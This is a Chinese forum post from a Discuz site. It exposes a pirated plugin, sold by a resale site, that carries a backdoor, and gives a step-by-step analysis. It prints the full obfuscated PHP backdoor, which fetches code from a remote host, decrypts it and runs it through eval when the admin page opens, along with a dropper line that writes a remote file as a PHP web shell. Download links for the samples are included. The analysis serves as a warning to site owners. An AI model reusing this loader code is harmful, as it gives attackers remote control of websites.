【续集】魔趣吧的东西真的有后门木马,揭秘用盗版的危害
<strong>上次写了一篇文章 披露了盗版市场的乱象 ,没想到本人遭到</strong><strong><font color="#ff0000">魔趣吧的站长</font></strong><strong>疯狂的报复。我自己的网站已经持续快<font color="#ff0000">10天</font>被<font color="#ff0000">魔趣吧的站长</font>使用DDOS攻击技术,打不开了!</strong><strong>因为在其网站进行了手机绑定,手机也整天被短信+电话轰炸!搞的我最近经常要开<font color="#ff0000">飞行模式!</font></strong><br /><strong><font color="#000000">但是我是绝对不会像黑恶势力低头的,大不了我网站不做了,手机号码不用了!</font></strong><br /><br /><blockquote>前文回顾:魔趣吧的东西好像真的有后门木马,改了我dz的后台密码<br />https://www.dismall.com/thread-5095-1-1.html</blockquote><br />因为前面的那篇文章写的比较概况,没有列举证据(<font color="#c0c0c0">导致其大肆误导不明真相的群众说我在造谣</font>),今天我就来列举一些证据,并对已知的后门进行深入详细的分析!<br />这可能是最后一篇曝光盗版市场乱象的文章了,因为我只是一个普普通通的站长!那些江湖经验丰富的站长我惹不起,我也见识了魔趣吧是如果把黑的说成白的!<br /><br /><font color="#8b0000"><strong>他的理念就是</strong></font>:<font color="#ffff00"><font style="background-color:black">只要对他有利的都是好文章,曝光他的都是在造谣他!</font></font><br /><br /><font color="#ff0000">在正式进入主题之前,我想在说几句题外话:先不说他有没有干些见不得人的事,其损坏原创开发者权益,谋取自己的利益(</font><font color="#48d1cc">俗称:盗版</font><font color="#ff0000">),还有什么资格在那一副正人君子的模样怼这个怼那个!</font><br /><br />【下面才是今天要说的主题】<br />由于带后门的资源有点多,今天我就随便拿个在魔趣吧收费的资源,且我之前安装过,受害的资源来做分析!<br /><br /><strong>样本下载链接:</strong>为了不给他打广告,帖子ID:<font color="#ffffff"><font style="background-color:black"> 9183 </font></font>,知道他网站的随便打开一个帖子把id换成这个就可以定位到!<br /><br />因为是VIP资源,所以我分享到了蓝奏网盘:https://wws.lanzous.com/iH9IQe6jymf 密码:c9mx<br /><br /><strong>附件MD5值:</strong>C03B189CA9E0EA7F1229F609A48EC705<br /><font color="#c0c0c0">防止因为我的曝光,他会修改附件,然后狡辩!对本文有异议的朋友可以在本文发布不久的时候,前去下载对比MD5值后,并效验是不是存在本文提到的后门木马!</font><br /><br /><strong>样本插件名称:</strong>积分提现中心 V1.2<br /><br /><strong>木马文件所在路径:</strong>keke_tixian\function\function_core.php<br /><font style="background-color:black"><font color="#ffffff"><br /></font></font><br /><strong>木马完整代码:</strong><br /><ol><li><?php<br /><li>function zm_diconv($str){<br /><li> $encode = mb_detect_encoding($str, array(<br /><li><br /><li> "ASCII",<br /><li><br /><li> "UTF-8",<br /><li><br /><li> "GB2312",<br /><li><br /><li> "GBK",<br /><li><br /><li> "BIG5"<br /><li><br /><li> ));<br /><li><br /><li> if ($encode != CHARSET) {<br /><li><br /><li> //$keytitle = iconv($encode,CHARSET."//IGNORE",$str);<br /><li><br /><li> $keytitle = mb_convert_encoding($str, CHARSET, $encode);<br /><li><br /><li> }<br /><li><br /><li> if (!$keytitle) {<br /><li><br /><li> $keytitle = $str;<br /><li><br /><li> }<br /><li><br /><li> return $keytitle;<br /><li><br /><li>}<br /><li>function caidi($oo){<br /><li> $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';<br /><li> $forver=stripos($love,'d');<br /><li> $forvere=stripos($love,'z');<br /><li> $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/.*/"),array(".","://","/"),$love);<br /><li> $forveres='DECODE';<br /><li> $aini=substr($love,$forver,$forvere);//获取方法函数名decrypt<br /><li> $aini=$oo?$forveres:$aini;<br /><li> return $aini;<br /><li>}<br /><li>function decrypt($data, $key = '721520') {<br /><li> global $_G;<br /><li> $key = $key ? $key : $_G['config']['security']['authkey'];<br /><li> $type = caidi($key);<br /><li> return authcode($data,$type, $key);<br /><li> }<br /><li><br /><li>function contentz($svip) {<br /><li>if(function_exists('file_get_contents')) {<br /><li>$data = file_get_contents($svip);<br /><li>} else {<br /><li>$ch = curl_init();<br /><li>$timeout = 5; <br /><li>curl_setopt ($ch, CURLOPT_URL, $svip);<br /><li>curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); <br /><li>curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);<br /><li>$data = curl_exec($ch);<br /><li>curl_close($ch);<br /><li>}<br /><li>return $data;<br /><li>}<br /><li>$iloveyou = caidi($oo);<br /><li>eval($iloveyou(strip_tags(contentz($love))));<br /><li>?></ol><strong>关键代码:</strong><br /><ol><li>$iloveyou = caidi($oo);<br /><li>eval($iloveyou(strip_tags(contentz($love))));</ol><br /><br /><strong>有了这些信息 我们下面进行分析(</strong><font color="#c0c0c0">在这里大胆的猜测一下:文件完全是魔趣吧自己加进去的,正版可能就没有这个文件,因为这个文件代码全是和后门有关!和插件自身功能没有关系</font><strong>)</strong><br /><strong>在关键代码前面的都是木马伪装所需要用到的函数 执行过程如下:</strong><br /><strong><font size="5"><font color="#ff0000">1/----------------------</font></font></strong><br /><br /><strong>后门脚本执行入口:</strong>keke_tixian\admin.inc.php<br />关键代码在该文件第7行:<strong>引用后门文件并执行</strong><br /><font color="#ffffff"><font style="background-color:silver">require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';</font></font><br /><font color="#0000ff">解释:</font>只要安装插件一打开后台的插件设置,木马就自动执行了!<br /><br /><strong><font size="5"><font color="#ff0000">2/--------</font></font></strong>依次执行<strong><font size="5"><font color="#ff0000">---</font></font></strong><strong><font size="5"><font color="#ff0000">-----</font></font></strong><strong><font size="5"><font color="#ff0000">--</font></font></strong><br /><font style="background-color:black"><font color="#ffffff"><br /></font></font><br /><font style="background-color:black"><font color="#ffff00"> $iloveyou = caidi($oo); </font></font><br /><font color="#0000ff">解释:</font>定义一个名为 <font color="#ffffff"><font style="background-color:silver"> iloveyou </font></font> 的变量 ,值为: <font color="#ffffff"><font style="background-color:silver"> caidi($oo) </font></font><br />调试:<font style="color:rgb(255, 255, 255)"><font style="background-color:rgb(0, 0, 0)"> </font></font><font style="background-color:rgb(0, 0, 0)"><font color="#ffff00">$iloveyou = caidi($oo); </font></font><font color="#c0c0c0"><font style="background-color:rgb(0, 0, 0)">echo</font><font style="background-color:rgb(0, 0, 0)"> </font></font><font color="#c0c0c0"><font style="background-color:rgb(0, 0, 0)">$iloveyou.$love; </font></font><font color="#c0c0c0"><font style="background-color:rgb(0, 0, 0)">exit;</font><font style="background-color:rgb(0, 0, 0)"> </font></font>,得到 <font color="#ffffff"><font style="background-color:silver"> iloveyou </font></font> 的值等于:<font color="#ff00ff">decrypt</font><br /><font color="#ff00ff">备注:</font>函数<font style="background-color:olive"><font color="#ffffff"> caidi </font></font> 定义并赋值了 <font style="background-color:black"> </font><font style="color:rgb(255, 255, 0)"><font style="background-color:black">$love </font></font>作全局变量, <font color="#ffffff"><font style="background-color:silver"> love </font></font> 的值等于:<font color="#ff0ff">htt去p://zonekey.w掉in/b中ai文duseo.xml </font><font color="#808080">(去掉中文)</font><br /><br /><strong><font size="5"><font color="#ff0000">3/--------</font></font></strong>依次执行<strong><font size="5"><font color="#ff0000">---</font></font></strong><strong><font size="5"><font color="#ff0000">-----</font></font></strong><strong><font size="5"><font color="#ff0000">--</font></font></strong><br /><br /><font style="background-color:black"><font color="#ffff00"> eval($iloveyou(strip_tags(contentz($love)))); </font></font><br /><br /><font color="#00ff">解释:</font>已知 <font color="#ffffff"><font style="background-color:silver"> iloveyou </font></font> 的值等于:<font color="#ff00ff">decrypt</font>,得到<font style="color:rgb(255, 255, 0)"><font style="background-color:rgb(0, 0, 0)"> eval(</font></font><font color="#ff0ff"><font style="background-color:black">decrypt</font></font><font style="color:rgb(255, 255, 0)"><font style="background-color:rgb(0, 0, 0)">(strip_tags(contentz(</font></font><font color="#ff0ff"><font style="background-color:black">htt去p://zonekey.w掉in/b中ai文duseo.xml</font></font><font style="color:rgb(255, 255, 0)"><font style="background-color:rgb(0, 0, 0)">)))); </font></font><br /><br />分析函数 <font style="background-color:olive"><font color="#ffffff"> contentz </font></font> 得知该函数 是访问远程链接并返回内容,相当于 <font color="#ffffff"><font style="background-color:rgb(128, 128, 0)"> </font></font><font style="background-color:rgb(128, 128, 0)"><font color="#ffffff">curl </font></font><br />分析函数 <font style="background-color:olive"><font color="#ffffff"> decrypt </font></font> 得知该函数 是进行内容解密,直接调用了DISCUZ自带的解密函数 <font color="#ffffff"><font style="background-color:rgb(128, 128, 0)"> </font></font><font style="background-color:rgb(128, 128, 0)"><font color="#ffffff">authcode </font></font><br /><font color="#00ff"><br /></font><br /><font color="#00ff">解释的解释</font>:代码 <font color="#ffff0"><font style="background-color:rgb(0, 0, 0)"> eval($iloveyou(strip_tags(contentz($love)))); </font></font>,经过层层分析,最终为:<br /><font color="#ffff0"><font style="background-color:rgb(0, 0, 0)"> </font></font><font style="background-color:rgb(0, 0, 0)"><font color="#f5deb3">执行脚本</font></font><font color="#ffff0"><font style="background-color:rgb(0, 0, 0)"> ( </font></font><font style="background-color:rgb(0, 0, 0)"><font color="#ffc0cb">解密</font></font><font color="#ffff0"><font style="background-color:rgb(0, 0, 0)"> ( </font></font><font style="background-color:rgb(0, 0, 0)"><font color="#ffc0cb">访问</font></font><font style="background-color:rgb(0, 0, 0)"><font color="#ffc0cb">远程代码</font></font><font color="#ffff0"><font style="background-color:rgb(0, 0, 0)"> ( </font></font><font color="#ff0ff"><font style="background-color:black">htt去p://zonekey.w掉in/b中ai文duseo.xml</font></font><font style="color:rgb(255, 255, 0)"><font style="background-color:rgb(0, 0, 0)"> ) ) ) ); </font></font><br /><br /><strong><font size="5"><font color="#ff0000">4/--------</font></font></strong>依次执行<strong><font size="5"><font color="#ff0000">---</font></font></strong><strong><font size="5"><font color="#ff0000">-----</font></font></strong><strong><font size="5"><font color="#ff0000">--</font></font></strong><br /><br />因 <font color="#c0c0c0">htt去p://zonekey.w掉in/b中ai文duseo.xml </font>该链接现在访问返回的全部是 1111111111111111,所以无法继续分析远程的代码是什么!<br /><br />可能魔趣吧站长已经知道我接下来会深入曝光他。所以暂时把远程代码先全部改成了 1111111111111111<br />即使是这样!又如何? 执行远程脚本 有什么危害?相信做网站的都知道!这里我不进行科普!感兴趣的站长可以百度自行科普:例:一句话木马,菜刀!<br />下面的代码是我网站自动多出来的一个文件:因为无法继续分析,直接看结果<br /><ol><li><?php <br /><li>file_put_contents("schizwcingu.php",file_get_contents("http://iqqvps.com/xss.txt"));</ol>上面的xss.txt 防止 魔趣吧站长 再去取消 我上传到了 蓝奏网盘 https://wws.lanzous.com/iPkAWe6na9c 密码:i1nc<br /><br /><font size="5"><font color="#ff0000"><strong>End/--------</strong></font></font>刨根问底<strong><font size="5"><font color="#ff0000">---</font></font></strong><strong><font size="5"><font color="#ff0000">-----</font></font></strong><br /><br />在前面一篇文章中提到过了 魔趣吧站长声称该木马是源码哥的!<br />但是既然干了,就干到底!<br />百度了一下 搜索 到 源码哥 ,在他网站搜索 了一下 积分提现中心 果然找到一个一模一样的版本!<br />花了20块钱下载下来(真黑啊,1.2 这么旧的版本还卖20),不过花20块钱 能让大家看清,防止中木马。也值得!<br /><br />结局打脸: 没有 keke_tixian\function\function_core.php 这个文件,因为是边写边弄的,既然写好了就这样吧!<br />虽然没有发现木马,但是应该<strong>也是一丘之貉,还是呼吁大家不要用盗版!不要用盗版!不要用盗版!</strong><br /><br /><strong><font size="7"> PS:对魔趣吧站长传播木马,DDOS我的网站,短信+电话轰炸我的手机号 表示非常的鄙视!</font></strong><br /><font size="4"><br /></font><br /><font size="4"><font color="#ff0000"><strong>希望官方管理员能够曝光这篇文章,让更多准备用盗版的站长、已经在用盗版的站长。赶紧回头是岸!</strong></font></font><br /><strong>样本已经上传到蓝奏网盘,文章写的不到位的地方,欢迎各路大神补充!</strong><br /><font style="background-color:black"><font color="#ffff00"><br /></font></font><br /><br />盗版<em>, </em>站长<em>, </em>魔趣 <strong>文中忘记说了!不能编辑 就占楼吧!</strong><br /><strong>看图打脸</strong><br /><img title="QQ图片20200630202743.png" id="aimg_7957" aid="7957" src1="static/image/common/none.gif" zoom="https://www.dismall.com/data/attachment/forum/202006/30/202804xvniiwirm0y1y7fm.png" src="https://www.dismall.com/data/attachment/forum/202006/30/202804xvniiwirm0y1y7fm.png" class="zoom" onclick="zoom(this, this.src, 0, 0, 0)" width="600" inpost="1" onmouseover="showMenu({'ctrlid':this.id,'pos':'12'})" /><br /><br />1、保证无后门 <br /><font color="#ff0000">打脸:无后门!只是有木马</font><br /><font color="#ff0ff">不如:</font>保证无后门,绝对有木马!<br /><br /><strong>2、魔趣吧修复后发布!</strong><br /><font color="#ff0000">打脸:正版好好的东西,被魔趣吧修复一下就多了个后门木马?</font><br /><font color="#ff00ff">不如:魔趣吧增加木马后发布</font><br /><br /><strong>3、资源均经测试,请放心使用!</strong><br /><font color="#ff0000">打脸:放个木马在你网站,你能放心?</font><br /><font color="#ff00ff">不如:木马功能已经测试,请放心使用!零失误!</font><br /><br /><br /><strong>4、官方认证图标</strong><br /><font color="#ff0000">打脸:魔趣吧官方正版木马,请放心中毒!</font><br /><br /><br /> <strong><font size="5">申明:本文不是针对 可可 正版的应用 正版应用肯定是没有木马的!<br />本文说的是盗版的!</font></strong><br /><br /> 简单点说:无利不起早<br /><br />开发者的利,自然是卖产品,也就是卖插件模板,为了多得利,自然要做好产品<br />站长的利,自然是通过程序赚钱或专区流量最终变现(也许你现在不赚钱,但别说永远不打算赚钱)<br />盗版站的利,要么是钱,要么是流量,但最终和站长是一样的,还是变现,如果打着所谓免费旗号,那么最终一定会在隐藏的地方来想办法赚钱,那么很明显,黑产是最简单的选择,那么后门木马就不稀奇了。<br /><br />赚钱可以,但请通过自己的劳动正当获益,你要是自己写代码提供给站长,谁也没权利指责你,但开发者费时费力的劳动所得,你偷去倒卖,这就很不道德了,并且不止是不道德,这是违法的。<br /><br />再加上黑产,那么就更加让人愤怒了,也就是说两头吃。<br /><br />无利不起早,为利无可厚非,但请紧守底线,尊重别人的劳动。<br /><br />经常有“站长”指责开发者卖的贵,不厚道。那么请你能写出一样的东西免费提供出来,但不能是偷别人的东西提供出来哦。当你能写出一样的东西的时候,并能始终免费提供,我向您投以真诚的敬意。<br /><br />但别人通过大量的学习、探索、耗费精力和时间,劳动所得写出的内容,以此获取回报,则不能予以谴责。我们自然应当感恩免费的馈赠,但也同时应当尊重劳动回报的需求。 以前贪便宜也是用盗版插件模版,安全中心三天两头的发出风险告警首页老是被改,删除了所有盗版插件模版,现在一直好好的 魔趣我不知道 反正哪个源码哥的肯定是有木马。都自己修改内容 几百块一个月上高防就行。 <br />能舍得几百块一个月高防用盗版,何不花百十块买个正版使用,不香吗? 嗯,当我看见你那个帖子的时候,发现一个叫做魔趣吧的用户回复了你但被discuz管理员屏蔽了我就知道事情不简单。我不站楼主和魔趣吧,我站discuz管理员的做法(放肆的大笑) 这故事引起了我的注意
頁:
[1]